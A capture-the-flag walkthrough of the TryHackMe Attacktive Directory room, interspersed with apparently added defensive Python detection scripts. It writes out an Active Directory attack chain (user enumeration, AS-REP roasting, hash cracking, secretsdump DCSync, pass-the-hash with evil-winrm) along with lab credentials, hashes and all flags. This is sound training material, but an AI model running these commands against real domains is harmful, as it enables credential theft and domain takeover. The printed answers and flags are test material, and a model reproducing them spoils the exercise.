TryHackMe ActiveDirectory || Walkthrough

Welcome! It is time to look at the Attacktive Directory room of THM. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THM's rooms.
Join me in learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Room URL: https://tryhackme.com/room/attacktivedirectory
Task 1 (Deploy the machine)
I assume you have tried this before. Start up the machine on THM, and start up your Kali machine or AttackBox. Let’s move on.
Task 2 (Setup)
The only thing to do here is to install Impacket, Bloodhound, and Neo4j.
In summary, you need to take these steps:
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install
Read the instructions on THM if you need more help. If you use an AttackBox you are likely ready to go!
Questions
Install Impacket, Bloodhound, and Neo4j
Answer: No answer needed.
Task 3 (Welcome to Attacktive Directory)
Basic enumeration starts out with an Nmap scan. Nmap is a relatively complex utility that has been refined over the years to detect what ports are open on a device, what services are running, and even what operating system is running. It’s important to note that not all services may be detected correctly or enumerated to their fullest potential. Despite Nmap being a complex utility, it cannot enumerate everything. Therefore, after an initial Nmap scan, we’ll be using other utilities to help us enumerate the services running on the device.
For more information on Nmap, check out the Nmap room.
Questions
Let’s start by running an Nmap scan before answering questions. For this, I use the following command:
nmap -sV -sC -oN nmap.out <target ip>
This gives the following results:

Results of running Nmap
We see a bunch of services: DNS, IIS, Kerberos, RPC, NetBIOS, Active Directory, and more! Now we can start answering questions.
What tool will allow us to enumerate port 139/445?
Ports 139 and 445 are used by SMB. To enumerate SMB a great tool to use is enum4linux.
Answer: enum4linux
What is the NetBIOS-Domain Name of the machine?
Here we can simply run:
enum4linux <target ip>

The NetBIOS domain name is mentioned several times.
Answer: THM-AD
What invalid TLD do people commonly use for their Active Directory Domain?
TLD stands for Top Level Domain. If we look back at the Nmap results, we can see the AD domain mentioned in the info on port 3389. The domain is called spookysec.local.
Answer: local
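The two Task 3 answers both come straight out of the Nmap output, so here is a small parser for that output. This is an added example, not code from the room or the walkthrough: the scan text below is constructed to look like the normal (-oN) output described above, with the host names made up, and it pulls out the open ports, the rdp-ntlm-info block, and whether the DNS domain ends in a reserved TLD such as .local (reserved for multicast DNS by RFC 6762, which is why it is an invalid choice for an AD domain).

```python
import re

# Constructed sample of nmap -oN ("normal") output. It is not the author's real
# scan; the port list and rdp-ntlm-info values mirror what the walkthrough
# reports, while the computer names are made up.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.80 scan initiated as: nmap -sV -sC -oN nmap.out 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.050s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: DC01.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2020-01-01T00:00:00+00:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# "<port>/<proto>  <state>  <service>  [<version>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# "|   Key: value" or "|_  Key: value" inside an NSE script block
SCRIPT_KV = re.compile(r"^\|[_ ]?\s*([A-Za-z_]+):\s*(.*)$")

# .local is reserved for multicast DNS (RFC 6762); it is not a registrable TLD.
RESERVED_TLDS = {"local"}

# Ports whose presence together is the usual sign of a domain controller.
AD_PORTS = {53: "DNS", 88: "Kerberos", 139: "NetBIOS", 389: "LDAP", 445: "SMB", 3389: "RDP"}


def parse_nmap_normal(text):
    """Parse nmap -oN output into a port table plus the rdp-ntlm-info key/values."""
    ports, ntlm_info, in_ntlm = [], {}, False
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            in_ntlm = False
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": (version or "").strip()})
            continue
        if line.startswith("| rdp-ntlm-info"):
            in_ntlm = True
            continue
        if in_ntlm and line.startswith("|"):
            kv = SCRIPT_KV.match(line)
            if kv:
                ntlm_info[kv.group(1)] = kv.group(2).strip()
        else:
            in_ntlm = False  # any non-script line ends the block
    return {"ports": ports, "ntlm_info": ntlm_info}


def ad_exposure_summary(parsed):
    """Summarise domain naming and exposed AD services from a parsed scan."""
    info = parsed["ntlm_info"]
    dns_domain = info.get("DNS_Domain_Name", "")
    tld = dns_domain.rsplit(".", 1)[-1].lower() if "." in dns_domain else ""
    exposed = sorted(p["port"] for p in parsed["ports"]
                     if p["state"] == "open" and p["port"] in AD_PORTS)
    return {
        "netbios_domain": info.get("NetBIOS_Domain_Name", ""),
        "dns_domain": dns_domain,
        "tld": tld,
        "tld_is_reserved": tld in RESERVED_TLDS,
        "exposed_ad_services": [AD_PORTS[p] for p in exposed],
        # Kerberos plus LDAP open on one host is the classic DC signature.
        "looks_like_domain_controller": {88, 389} <= set(exposed),
    }


if __name__ == "__main__":
    summary = ad_exposure_summary(parse_nmap_normal(SAMPLE_NMAP_OUTPUT))
    for key, value in summary.items():
        print(f"{key}: {value}")
```

The same parser works on any -oN file; only the rdp-ntlm-info handling is specific to this room's port 3389 script output.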
Task 4 (Enumerating Users via Kerberos)
A whole host of other services are running, including Kerberos. Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords, and even password spray!
For this box, a modified User List and Password List will be used to cut down on the time of enumeration of users and password hash cracking. It is NOT recommended to brute force credentials due to account lockout policies that we cannot enumerate on the domain controller.
Questions
What command within Kerbrute will allow us to enumerate valid usernames?
Some good documentation can be found here:
GitHub — ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing
We can find here that the answer to this question is userenum.
Answer: userenum
What notable account is discovered? (These should jump out at you)
First, we need to download Kerbrute from here:
Release v1.0.3 · ropnop/kerbrute
I used:
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
Then we need to run chmod +x on the executable to get the proper permissions. We can then use ./kerbrute_linux_amd64 to run Kerbrute.
To discover user accounts we can now run:
kerbrute userenum -dc <target ip> -d spookysec.local userlist.txt
The user list we need to use is found here:
https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
Running the command gives us the following:

Using Kerbrute to find Kerberos users
There are some interesting accounts here. The ones that stand out are svc-admin and backup.
Answer: svc-admin
What is the other notable account discovered? (These should jump out at you)
Answer: backup
Task 5 (Abusing Kerberos)
After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASREPRoasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos ticket for the specified user account.
Retrieving Kerberos Tickets
Impacket has a tool called “GetNPUsers.py” (located in impacket/examples/GetNPUsers.py) that will allow us to query ASREPRoastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames, which we enumerated previously via Kerbrute.
Questions
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
It’s time to find the GetNPUsers script, which is located at /opt/impacket/examples:

Finding the script
You can quickly get to the folder by changing into the Impacket directory in the terminal and then into its examples folder.
Afterward, add the two usernames from before (svc-admin and backup) to a simple text file, one per line.
We can then run:
python GetNPUsers.py -no-pass -usersfile ./users.txt -dc-ip <target ip> spookysec.local/
This returns that the user svc-admin can query a ticket with no password! We get the following Kerberos hash:
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:408ee4a3e91ec877b931d35c56364c77$63dc9e093d6f3ddfd0074033786ed4d4d6e5f3e9f27be7f98866c0c91c4271c6c8a721eafa9e343a2b9638da64fe71d7563c31e51e6aac0686ba9025ab8ff2d41b8b24f38888cd803c70568744a12daa95cca16b73fa6bc5b20f1fb697b29fd1fe39fa0553ae07ad7e6e2f5232e306ee2abf3ee2ba8ebc704bc96f0d60cd245f96f4caa7c20c3a673fba2b25a384593b01e334560348a146d9168e1fc594b8c59e11382193bd2b3f1c421f9d5fdc61167c8f3bfa18d60fc6fca79923c16b707927719330363b593c28ccc0c7dd2c5e7696b43d45a4bc016341f773805c53f51d2b6ae4a0fa3c3280a18a9d53d9b5fd08337c
Answer: svc-admin
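Both the Kerbrute user enumeration from Task 4 and the AS-REP request above leave traces on the domain controller in Security event 4768 ("A Kerberos authentication ticket (TGT) was requested"), so here is the detection side of both steps in one place. This is an added example, not code from the room or the walkthrough; the events are constructed to carry the 4768 fields the checks need (source IP, account, result code, pre-authentication type and ticket encryption type), with the IP addresses and most account names made up. The first check looks for a burst of "client principal unknown" failures (0x6) from one source, which is what guessing names off a wordlist produces when Kerberos Authentication Service auditing is on; the second flags TGTs issued with PreAuthType 0 (no pre-authentication) and the RC4 encryption type 0x17, the combination an AS-REP roast request produces.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of event 4768 records, reduced to the needed fields; these
# are not logs from the room. Status uses the Kerberos result codes Windows
# records: 0x0 success, 0x6 KDC_ERR_C_PRINCIPAL_UNKNOWN. Failed requests carry
# no pre-auth type and an etype of 0xffffffff. PreAuthType 0 means the TGT was
# issued without pre-authentication; etype 0x17 is RC4-HMAC, 0x12 is AES256.
SAMPLE_4768 = [
    {"time": "2020-01-01T10:00:00", "ip": "10.10.14.5", "user": "alice",     "status": "0x6", "preauth": None, "etype": "0xffffffff"},
    {"time": "2020-01-01T10:00:01", "ip": "10.10.14.5", "user": "bob",       "status": "0x6", "preauth": None, "etype": "0xffffffff"},
    {"time": "2020-01-01T10:00:01", "ip": "10.10.14.5", "user": "carol",     "status": "0x6", "preauth": None, "etype": "0xffffffff"},
    {"time": "2020-01-01T10:00:02", "ip": "10.10.14.5", "user": "dave",      "status": "0x6", "preauth": None, "etype": "0xffffffff"},
    {"time": "2020-01-01T10:00:02", "ip": "10.10.14.5", "user": "erin",      "status": "0x6", "preauth": None, "etype": "0xffffffff"},
    {"time": "2020-01-01T10:00:03", "ip": "10.10.14.5", "user": "frank",     "status": "0x6", "preauth": None, "etype": "0xffffffff"},
    # the AS-REP roast request for the account without pre-authentication
    {"time": "2020-01-01T10:00:04", "ip": "10.10.14.5", "user": "svc-admin", "status": "0x0", "preauth": 0,    "etype": "0x17"},
    # a user mistyping their name once, then logging on normally: not an alert
    {"time": "2020-01-01T10:05:00", "ip": "10.10.20.7", "user": "bakcup",    "status": "0x6", "preauth": None, "etype": "0xffffffff"},
    {"time": "2020-01-01T10:05:01", "ip": "10.10.20.7", "user": "backup",    "status": "0x0", "preauth": 2,    "etype": "0x12"},
]

ENUM_THRESHOLD = 5               # unknown-principal failures from one source ...
ENUM_WINDOW = timedelta(seconds=60)  # ... inside this window
PRINCIPAL_UNKNOWN = "0x6"
NO_PREAUTH = 0
RC4_HMAC = "0x17"


def find_user_enumeration(events, threshold=ENUM_THRESHOLD, window=ENUM_WINDOW):
    """Return {source_ip: count} for sources whose densest run of 0x6 failures
    within `window` reaches `threshold`."""
    failures = defaultdict(list)
    for e in events:
        if e["status"] == PRINCIPAL_UNKNOWN:
            failures[e["ip"]].append(datetime.fromisoformat(e["time"]))
    hits = {}
    for ip, times in failures.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):          # sliding window over sorted times
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = best
    return hits


def find_asrep_roast(events):
    """Return sorted (account, source_ip) pairs for TGTs issued with no
    pre-authentication and an RC4 session key: the AS-REP roast signature."""
    return sorted({(e["user"], e["ip"]) for e in events
                   if e["status"] == "0x0" and e["preauth"] == NO_PREAUTH and e["etype"] == RC4_HMAC})


if __name__ == "__main__":
    print("enumeration sources:", find_user_enumeration(SAMPLE_4768))
    print("AS-REP roast candidates:", find_asrep_roast(SAMPLE_4768))
```

The roast check is deliberately narrow: an account that has pre-authentication switched off but whose TGTs are AES-only still shows up with PreAuthType 0, so a broader rule would drop the etype condition and instead review every account with that flag set.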
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
If we look at the following page:
example_hashes [hashcat wiki]
We can see that it is hash mode 18200, since our hash starts with the same characters ($krb5asrep$23$). The name for this type of hash is Kerberos 5 AS-REP etype 23.
Answer: Kerberos 5 AS-REP etype 23
What mode is the hash?
Answer: 18200
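Identifying the hash mode by eye works for one hash, but it helps to know what the pieces of the string actually are. This added example (not code from the room, the walkthrough or Impacket) splits the $krb5asrep$ line returned above into its fields, maps the prefix to the hashcat mode, and also triages a constructed GetNPUsers-style output in which one account is reported as requiring pre-authentication; the hash itself is the one printed in Task 5.

```python
import re

# Hashcat modes for the Kerberos hash prefixes that appear in this walkthrough.
KERBEROS_HASHCAT_MODES = {
    "$krb5asrep$23$": (18200, "Kerberos 5, etype 23, AS-REP"),
    "$krb5tgs$23$":   (13100, "Kerberos 5, etype 23, TGS-REP"),
}

# $krb5asrep$<etype>$<user>@<REALM>:<16-byte checksum, hex>$<encrypted enc-part, hex>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

# The AS-REP hash from the walkthrough (svc-admin in SPOOKYSEC.LOCAL).
PAGE_HASH = (
    "$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:408ee4a3e91ec877b931d35c56364c77$"
    "63dc9e093d6f3ddfd0074033786ed4d4d6e5f3e9f27be7f98866c0c91c4271c6c8a721eafa9e343a2b9638da64fe71d7563c31e51e6aac0686ba9025ab8ff2d41b8b24f38888cd803c70568744a12daa95cca16b73fa6bc5b20f1fb697b29fd1fe39fa0553ae07ad7e6e2f5232e306ee2abf3ee2ba8ebc704bc96f0d60cd245f96f4caa7c20c3a673fba2b25a384593b01e334560348a146d9168e1fc594b8c59e11382193bd2b3f1c421f9d5fdc61167c8f3bfa18d60fc6fca79923c16b707927719330363b593c28ccc0c7dd2c5e7696b43d45a4bc016341f773805c53f51d2b6ae4a0fa3c3280a18a9d53d9b5fd08337c"
)

# Constructed GetNPUsers-style output: the "[-] User ... doesn't have
# UF_DONT_REQUIRE_PREAUTH set" line is what Impacket prints for an account that
# still requires pre-authentication.
SAMPLE_GETNPUSERS_OUTPUT = [
    "",
    "[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set",
    PAGE_HASH,
]
PREAUTH_REQUIRED_RE = re.compile(r"^\[-\] User (\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set$")


def identify_mode(line):
    """Return (mode, name) for a known Kerberos hash prefix, else (None, None)."""
    for prefix, mode in KERBEROS_HASHCAT_MODES.items():
        if line.startswith(prefix):
            return mode
    return (None, None)


def parse_asrep_hash(line):
    """Split a $krb5asrep$ line into its fields and attach the hashcat mode."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a well-formed $krb5asrep$ line")
    f = m.groupdict()
    etype = int(f["etype"])
    mode, name = identify_mode(line.strip())
    return {
        "etype": etype,
        "user": f["user"],
        "realm": f["realm"],
        # For etype 23 (RC4-HMAC) the 16 bytes before the '$' are the HMAC-MD5
        # checksum over the encrypted enc-part that follows it.
        "checksum_hex": f["checksum"].lower(),
        "enc_part_hex_len": len(f["edata"]),
        "hashcat_mode": mode,
        "hashcat_name": name,
        # The RC4-HMAC key is the account's NT hash (unsalted MD4 of the
        # password), which is why this encryption type cracks quickly.
        "weak_etype": etype == 23,
    }


def triage_getnpusers_output(lines):
    """Classify accounts in GetNPUsers output as roastable (a hash was
    returned) or as still requiring pre-authentication."""
    result = {"roastable": [], "preauth_required": []}
    for line in lines:
        m = PREAUTH_REQUIRED_RE.match(line)
        if m:
            result["preauth_required"].append(m.group(1))
            continue
        try:
            parsed = parse_asrep_hash(line)
        except ValueError:
            continue
        result["roastable"].append((parsed["user"], parsed["hashcat_mode"]))
    return result


if __name__ == "__main__":
    parsed = parse_asrep_hash(PAGE_HASH)
    print(f"{parsed['user']}@{parsed['realm']}: etype {parsed['etype']}, "
          f"hashcat mode {parsed['hashcat_mode']} ({parsed['hashcat_name']})")
    print(triage_getnpusers_output(SAMPLE_GETNPUSERS_OUTPUT))
```

From a hardening point of view the interesting field is weak_etype: an account that needs "Does not require Pre-Authentication" for some legacy reason is far less exposed if it is restricted to AES encryption types.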
Now crack the hash with the modified password list provided, what is the user account password?
Now that we know the mode, we can use hashcat to crack the Kerberos hash. Make sure you save the hash to a file (hash.txt below). You also need to save the password list located at https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt.
Then run the following command:
hashcat -m 18200 hash.txt passwordlist.txt
This gives us the answer:

Cracking the Kerberos hash
The cracked password is appended to the end of the hash line in hashcat's output.
Answer: management2005
Task 6 (Back to the Basics)
With a user’s account credentials, we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.
Questions
What utility can we use to map remote SMB shares?
Answer: smbclient
Which option will list shares?
You can find this answer by running man smbclient.
The answer is -L.
Answer: -L
How many remote shares is the server listing?
Run the following command:
smbclient -L <target ip> -U svc-admin

Listing the SMB shares as svc-admin
The number is 6.
Answer: 6
There is one particular share that we have access to that contains a text file. Which share is it?
We can run the following command to access the backup share as svc-admin:
smbclient \\\\<target ip>\\backup -U svc-admin

Accessing the backup share
Answer: backup
What is the content of the file?
See above. Download the file by using get.
Answer: YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Decoding the contents of the file, what is the full contents?
We can decode the base64 by entering it at the following url:
Base64 Decode and Encode — Online
This seems to be a username and password!
Answer: backup@spookysec.local:backup2517860
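Credentials left in a text file on a share, base64-encoded or not, are a finding a defender wants to catch before anyone else does. This added example (not code from the room or the walkthrough) does the decoding step above programmatically and turns it into a small scanner: it pulls base64-looking tokens out of file contents, decodes the ones that are valid printable text, and reports any that decode to the user@domain:secret layout seen here. The file contents are constructed; only the first line is the string from the share, and the secret is redacted in the output.

```python
import base64
import binascii
import re

# Constructed contents of a text file of the kind found on a file share. The
# first line is the base64 string from the walkthrough; the rest is filler
# that must not be reported (a harmless base64 blob, prose, a hex identifier).
SAMPLE_SHARE_FILE = """\
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
aGVsbG8gd29ybGQgdGhpcyBpcyBmaW5l
Reminder: rotate the service account password quarterly.
build-id: 0123456789abcdef0123456789abcdef
"""

# Runs of base64 alphabet long enough to hold a short credential.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# user@domain:secret, the layout the file on the share turned out to have.
CRED_RE = re.compile(r"^(?P<user>[A-Za-z0-9._-]+@[A-Za-z0-9.-]+):(?P<secret>\S+)$")


def decode_if_base64_text(token):
    """Decode a token if it is valid base64 for printable ASCII, else None."""
    try:
        raw = base64.b64decode(token, validate=True)  # strict: alphabet and padding
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def redact(secret):
    """Keep two characters so the finding is recognisable without exposing the value."""
    return secret[:2] + "*" * (len(secret) - 2)


def find_encoded_credentials(text):
    """Return findings for base64 blobs that decode to a user@domain:secret string."""
    findings = []
    for token in B64_TOKEN.findall(text):
        decoded = decode_if_base64_text(token)
        if decoded is None:
            continue
        m = CRED_RE.match(decoded)
        if m:
            findings.append({"token": token, "user": m["user"],
                             "secret_redacted": redact(m["secret"])})
    return findings


if __name__ == "__main__":
    for f in find_encoded_credentials(SAMPLE_SHARE_FILE):
        print(f"credential for {f['user']} found (secret {f['secret_redacted']})")
```

Point it at every readable file on a share (smbclient's recurse and mget, or a mounted share) and the same function applies; the only room-specific part is the user@domain:secret pattern, which you would widen with whatever other credential layouts matter to you.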
Task 7 (Elevating Privileges within the Domain)
Now that we have new user account credentials, we may have more privileges on the system than before. The username of the account “backup” gets us thinking. What is this the backup account to?
Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes.
Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.
Questions
What method allowed us to dump NTDS.DIT?
Look at the output.

Using secretsdump to retrieve password hashes
Answer: DRSUAPI
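What secretsdump does through DRSUAPI is a replication request, and a domain controller that audits directory service access records it as Security event 4662 with the replication control-access rights in the Properties field. This added example (not code from the room, the walkthrough or Impacket) shows the usual detection for that: the events are constructed with the 4662 fields the check needs, the DC account names and logon ids are made up, and the three replication right GUIDs are the real well-known values. The twist this room illustrates is that the backup account genuinely holds those rights, so the rule cannot key on the right alone; it keys on who exercised it, treating domain controller machine accounts and an explicit allowlist as expected and everything else as an alert.

```python
# Control-access-right GUIDs for directory replication. A principal holding the
# first two on the domain naming context can pull every account's secrets
# through the DRSUAPI replication interface.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}
CONTROL_ACCESS = 0x100  # AccessMask bit for "Control Access" (extended rights)

# Constructed sample of event 4662 ("An operation was performed on an object")
# records, reduced to the needed fields; not logs from the room. Properties
# carries the GUIDs of the rights exercised, in braces as Windows writes them.
UNRELATED_GUID = "{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"  # constructed placeholder
SAMPLE_4662 = [
    # a domain controller replicating from its peer: expected
    {"event_id": 4662, "subject_user": "DC02$", "subject_domain": "THM-AD", "logon_id": "0x3e4",
     "access_mask": 0x100, "properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
                                          "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    # a user account pulling the directory: the secretsdump step of this room
    {"event_id": 4662, "subject_user": "backup", "subject_domain": "THM-AD", "logon_id": "0x7a3c1",
     "access_mask": 0x100, "properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
                                          "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    # an ordinary property read by another user: not replication
    {"event_id": 4662, "subject_user": "svc-admin", "subject_domain": "THM-AD", "logon_id": "0x5b210",
     "access_mask": 0x10, "properties": [UNRELATED_GUID]},
]

KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}  # constructed; in practice read the Domain Controllers OU
ALLOWED_SYNC_ACCOUNTS = set()           # e.g. a directory sync service account that legitimately replicates


def find_dcsync(events, dc_accounts=KNOWN_DC_ACCOUNTS, allowlist=ALLOWED_SYNC_ACCOUNTS):
    """Flag 4662 events in which a principal that is neither a DC machine
    account nor allowlisted exercised a replication control-access right."""
    hits = []
    for e in events:
        if e.get("event_id") != 4662 or not (e["access_mask"] & CONTROL_ACCESS):
            continue
        exercised = {g.strip("{}").lower() for g in e["properties"]} & REPLICATION_RIGHTS
        if not exercised:
            continue
        subject = e["subject_user"]
        if subject in dc_accounts or subject in allowlist:
            continue
        hits.append({"subject": e["subject_domain"] + "\\" + subject,
                     "logon_id": e["logon_id"],
                     "rights": sorted(exercised)})
    return hits


if __name__ == "__main__":
    for hit in find_dcsync(SAMPLE_4662):
        print(f"replication rights used by {hit['subject']} (logon {hit['logon_id']}): {hit['rights']}")
```

The complementary preventive check is a periodic review of which principals hold these three rights on the domain head; in this room that review would have surfaced the backup account long before its password turned up in a share.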
What is the Administrators NTLM hash?
Answer: 0e0363213e37b94221497260b0bcb4fc
What method of attack could allow us to authenticate as the user without the password?
https://en.wikipedia.org/wiki/Pass_the_hash
Answer: pass the hash
Using a tool called Evil-WinRM what option will allow us to use a hash?
Read more info here:
https://github.com/Hackplayers/evil-winrm
The option that takes an NTLM hash instead of a password is -H.
Answer: -H
Task 8 (Flag Submission Panel)
Submit the flags for each user account. They can be located on each user’s desktop.
Questions
We start by running the following command:
evil-winrm -i <target ip> -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
This gives us the following result:

Using WinRM to authenticate without a password
We now have admin access!
Now we can visit each user’s desktop to find the flag.
svc-admin

Reading the svc-admin flag
Answer: TryHackMe{K3rb3r0s_Pr3_4uth}
Now do the same for the other users.
backup

Reading the backup flag
Answer: TryHackMe{B4ckM3UpSc0tty!}
Administrator

Reading the administrator flag
Answer: TryHackMe{4ctiveD1rectoryM4st3r}
We are done! Great job. This was at times slightly difficult for me, as THM has until now not given me tons of experience hacking Active Directory. It was definitely fun though and has taught me tons!
Thank you for reading!